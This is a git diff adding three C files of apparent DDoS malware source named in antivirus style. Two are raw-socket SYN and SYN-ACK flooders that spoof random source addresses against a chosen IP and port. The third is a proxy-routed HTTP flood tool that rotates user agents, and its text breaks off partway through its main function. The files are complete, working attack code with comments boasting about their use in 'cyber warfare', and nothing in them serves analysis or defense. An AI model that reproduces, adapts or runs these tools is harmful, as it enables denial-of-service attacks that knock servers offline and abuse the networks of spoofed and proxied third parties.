index 00000000..694f8f98
--- /dev/null
+++ b/libs/VirTool.DDoS.ESSYN-ACK.c
@@ -0,0 +1,200 @@
+/*
+ * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
+ */
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+	x++;
+	c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+	struct tcp_pseudo
+	{
+	unsigned long src_addr;
+	unsigned long dst_addr;
+	unsigned char zero;
+	unsigned char proto;
+	unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(5678);
+	tcph->seq = rand();
+	tcph->ack_seq = rand();
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->syn = 1;
+	tcph->ack = 1;
+	tcph->window = rand();
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(floodport);
+	sin.sin_addr.s_addr = inet_addr(td);
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+	fprintf(stderr, "Could not open raw socket.\n");
+	exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+	tcph->dest = htons(floodport);
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+	sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+	iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+	iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	tcph->seq = rand_cmwc() & 0xFFFF;
+	tcph->source = htons(rand_cmwc() & 0xFFFF);
+	tcph->check = 0;
+	tcph->check = tcpcsum(iph, tcph);	
+	pps++;
+	if(i >= limiter)
+	{
+	i = 0;
+	usleep(sleeptime);
+	}
+	i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+	fprintf(stderr, "Invalid parameters!\n");
+	fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+	exit(-1);
+	}
+	fprintf(stdout, "Setting up Sockets...\n");
+	int num_threads = atoi(argv[3]);
+	floodport = atoi(argv[2]);
+	int maxpps = atoi(argv[4]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	int multiplier = 20;
+	int i;
+	for(i = 0;i<num_threads;i++){
+	pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.ESSYN.c b/libs/VirTool.DDoS.ESSYN.c
new file mode 100644
index 00000000..a768f5ef
--- /dev/null
+++ b/libs/VirTool.DDoS.ESSYN.c
@@ -0,0 +1,218 @@
+/*
+	This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
+*/
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+		x++;
+		c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+		unsigned long src_addr;
+		unsigned long dst_addr;
+		unsigned char zero;
+		unsigned char proto;
+		unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(5678);
+	tcph->seq = rand();
+	tcph->ack_seq = 1;
+	tcph->res2 = 1;
+	tcph->doff = 5;
+	tcph->syn = 1;
+	tcph->window = htons(65535);
+	tcph->check = 1;
+	tcph->urg_ptr = 1;
+}
+
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(floodport);
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+		fprintf(stderr, "Could not open raw socket.\n");
+		exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+
+	tcph->dest = htons(floodport);
+
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+
+	fprintf(stdout, "Setting up Sockets...\n");
+
+	int num_threads = atoi(argv[3]);
+	floodport = atoi(argv[2]);
+	int maxpps = atoi(argv[4]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	
+	int multiplier = 20;
+
+	int i;
+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.GHP.c b/libs/VirTool.DDoS.GHP.c
new file mode 100644
index 00000000..357101b7
--- /dev/null
+++ b/libs/VirTool.DDoS.GHP.c
@@ -0,0 +1,598 @@
+#include <pthread.h>
+#include <sys/resource.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <ctype.h>
+
+#define RND_CHAR (char)((rand() % 26)+97)
+
+char *useragents[] = {
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 RestSharp 102.0.0.0",
+	"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
+	"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.00",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; )",
+	"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12",
+	"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.5) Gecko/2009021916 Songbird/1.1.2 (20090331142126)",
+	"Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
+	"Mozilla/5.0 (X11; U; Linux; cs-CZ) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3)  rekonq",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1) Lobo/0.98.4",
+	"X-Smiles/1.2-20081113",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008120120 Blackbird/0.9991",
+	"Mozilla/5.0 (SCH-F859/F859DG12;U;NUCLEUS/2.1;Profile/MIDP-2.1 Configuration/CLDC-1.1;480*800;CTC/2.0) Dolfin/2.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Conkeror/0.9.3",
+	"LeechCraft (X11; U; Linux; ru_RU) (LeechCraft/Poshuku 0.3.55-324-g9365f23; WebKit 4.5.2/4.5.2)",
+	"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100317 Postbox/1.1.3",
+	"xine/1.1.16.3",
+	"Bunjalloo/0.7.6(Nintendo DS;U;en)",
+	"Mozilla/5.0 (X11; U; Linux i686; en-US; SkipStone 0.8.3) Gecko/20020615 Debian/1.0.0-3 ",
+	"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
+	"MMozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.1.5 Safari/533.3",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
+	"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
+	"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
+	"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
+	"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
+	"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
+	"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+};
+#define ATTACKPORT 80
+char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n%s";
+char *postpayload;
+struct urlparts {
+	char * name;
+	char separator[4];
+	char value[128];
+} parts[] = {
+	{ "scheme", ":" },
+	{ "userid", "@" },
+	{ "password", ":" },
+	{ "host", "//" },
+	{ "port", ":" },
+	{ "path", "/" },
+	{ "param", ";" },
+	/*{ "query", "?" },*/
+	{ "fragment", "#" }
+};
+enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
+#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
+struct urlparts *returnparts[8];
+struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
+struct proxy { char *type; char *ip; int port; int working; };
+struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
+struct list *head = NULL;
+char parseError[128];
+int parseURL(char *url, struct urlparts **returnpart);
+char * strsplit(char * s, char * tok);
+char firstpunc(char *s);
+int strleft(char * s, int n);
+void setupparts();
+void freeparts();
+char *stristr(const char *String, const char *Pattern);
+char *str_replace(char *orig, char *rep, char *with);
+char *geturl(char *url, char *useragent, char *ip);
+char *ipstr;
+static int rps = 0;
+
+void *flood(void *par) {
+	struct list *startpoint = (struct list *)par;
+	int i;
+	struct sockaddr_in serverAddr;
+	signal(SIGPIPE, SIG_IGN);
+	while(1)
+	{
+		int sent = 0;
+		if(startpoint->data->working == 0)
+		{
+			startpoint = startpoint->next;
+			sleep(1);
+			continue;
+		}
+		
+		memset(&serverAddr, 0, sizeof(serverAddr));
+		serverAddr.sin_family = AF_INET;
+		serverAddr.sin_port = htons(startpoint->data->port);
+		serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
+		int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+		u_int yes=1;
+		if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
+		if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
+		{
+			startpoint->data->working = 0;
+			startpoint = startpoint->next;
+			continue;
+		}
+		if(strcmp(startpoint->data->type, "Socks4")==0)
+		{
+			unsigned char buf[10];
+			buf[0] = 0x04;
+			buf[1] = 0x01;
+			*(unsigned short*)&buf[2] = htons(ATTACKPORT);
+			*(unsigned long*)&buf[4] = inet_addr(ipstr);
+			buf[8] = 0x00;
+			if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+		}
+		if(strcmp(startpoint->data->type, "Socks5")==0)
+		{
+			unsigned char buf[20];
+			buf[0] = 0x05;
+			buf[1] = 0x01;
+			buf[2] = 0x00;
+			if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			buf[0] = 0x05;
+			buf[1] = 0x01;
+			buf[2] = 0x00;
+			buf[3] = 0x01;
+			*(unsigned long*)&buf[4] = inet_addr(ipstr);
+			*(unsigned short*)&buf[8] = htons(ATTACKPORT);
+			if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+		}
+		if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
+		{
+			char *connectrequest = malloc(1024);
+			bzero(connectrequest, 1024);
+			sprintf(connectrequest, "CONNECT %s:25565 HTTP/1.0\r\n\r\n", ipstr);
+			if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			char *recvbuf = malloc(1024);
+			bzero(recvbuf, 1024);
+			int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
+			if(gotbytes < 1)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			free(recvbuf);
+		}
+		char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
+		if(httppayload == NULL)
+		{
+			startpoint = startpoint->next;
+			close(serverSocket);
+			continue;
+		}
+		char *tmp = NULL;
+		while((tmp = strstr(httppayload, "%RANDOM%"))!=NULL)
+		{
+			*(tmp) = RND_CHAR;
+			*(tmp+1) = RND_CHAR;
+			*(tmp+2) = RND_CHAR;
+			*(tmp+3) = RND_CHAR;
+			*(tmp+4) = RND_CHAR;
+			*(tmp+5) = RND_CHAR;
+			*(tmp+6) = RND_CHAR;
+			*(tmp+7) = RND_CHAR;
+		}
+		send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
+		free(httppayload);
+		close(serverSocket);
+		rps++;
+		usleep(50000);
+		//startpoint = startpoint->next;
+	}
+}
+
+int main(int argc, char *argv[ ]) {
+	if(argc < 6){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
+		exit(-1);
+	}
+	//fprintf(stdout, "Setting up Sockets...\n");
+	int num_threads = atoi(argv[3]);
+	char *method = argv[2];
+	if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
+	{
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
+		exit(-1);
+	}
+	FILE *pFile = fopen(argv[4], "rb");
+	if(pFile==NULL)
+	{
+		perror("fopen"); exit(1);
+	}
+	fseek(pFile, 0, SEEK_END);
+	long lSize = ftell(pFile);
+	rewind(pFile);
+	char *buffer = (char *)malloc(lSize*sizeof(char));
+	fread(buffer, 1, lSize, pFile);
+	fclose (pFile);
+	int i=0;
+	char *pch = (char *)strtok(buffer, ":");
+	while(pch != NULL)
+	{
+		if(head == NULL)
+		{
+			head = (struct list *)malloc(sizeof(struct list));
+			bzero(head, sizeof(struct list));
+			head->data = (struct proxy *)malloc(sizeof(struct proxy));
+			bzero(head->data, sizeof(struct proxy));
+			head->data->working = 1;
+			head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
+			pch = (char *)strtok(NULL, ":");
+			if(pch == NULL) exit(-1);
+			head->data->port = atoi(pch);
+			pch = (char *)strtok(NULL, ":");
+			head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
+			pch = (char *)strtok(NULL, ":");
+			head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
+			head->next = head;
+			head->prev = head;
+		} else {
+			struct list *new_node = (struct list *)malloc(sizeof(struct list));
+			bzero(new_node, sizeof(struct list));
+			new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
+			bzero(new_node->data, sizeof(struct proxy));
+			new_node->data->working = 1;
+			new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
+			pch = (char *)strtok(NULL, ":");
+			if(pch == NULL) break;
+			new_node->data->port = atoi(pch);
+			pch = (char *)strtok(NULL, ":");
+			new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
+			pch = (char *)strtok(NULL, ":");
+			new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
+			new_node->prev = head;
+			new_node->next = head->next;
+			head->next = new_node;
+		}
+	}
+	free(buffer);
+	const rlim_t kOpenFD = 1024 + (num_threads * 2);
+	struct rlimit rl;
+	int result;
+	rl.rlim_cur = kOpenFD;
+	rl.rlim_max = kOpenFD;
+	result = setrlimit(RLIMIT_NOFILE, &rl);
+	if (result != 0)
+	{
+		perror("setrlimit");
+		fprintf(stderr, "setrlimit returned result = %d\n", result);
+	}
+	bzero(&rl, sizeof(struct rlimit));
+	rl.rlim_cur = 256 * 1024;
+	rl.rlim_max = 4096 * 1024;
+	result = setrlimit(RLIMIT_STACK, &rl);
+	if (result != 0)
+	{
+		perror("setrlimit_stack");
+		fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
+	}
+	setupparts();
+	parseURL(argv[1], returnparts);
+	if(argc > 6 && !(strcmp(argv[6], "0") == 0))
+	{
+		ipstr = malloc(strlen(argv[6])+1);
+		bzero(ipstr, strlen(argv[6])+1);
+		strcpy(ipstr, argv[6]);
+		//fprintf(stdout, "Using manual IP...\n");
+	} else {
+		struct hostent *he;
+		struct in_addr a;
+		he = gethostbyname(returnparts[host]->value);
+		if (he)
+		{
+			while (*he->h_addr_list)
+			{
+				bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
+				ipstr = malloc(INET_ADDRSTRLEN+1);
+				inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
+				break;
+			}
+		}
+		else
+		{ herror("gethostbyname"); }
+	}
+	char *postdata = malloc(1);
+	bzero(postdata, 1);
+	char *extrahead = malloc(1);
+	bzero(extrahead, 1);
+	if(argc > 7)
+	{
+		//fprintf(stdout, "Using post parameters\n");
+		postdata = argv[7];
+		extrahead = malloc(4096);
+		bzero(extrahead, 4096);
+		sprintf(extrahead, "Content-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\n", strlen(postdata));
+	}
+	pthread_t thread[num_threads];
+	postpayload = malloc(4096);
+	sprintf(postpayload, postformat, method, returnparts[path]->value, returnparts[host]->value, extrahead, postdata);
+	freeparts();
+	
+	//fprintf(stdout, "Starting Flood...\n");
+	
+	for(i = 0;i<num_threads;i++){
+		pthread_create(&thread[i], NULL, &flood, (void *)head);
+		pthread_detach(thread[i]);
+		head = head->next;
+		head = head->next;
+                head = head->next;
+                head = head->next;
+		head = head->next;
+	}
+	
+	int temp = atoi(argv[5]);
+	
+	for(i = 0;i<temp;i++)
+	{
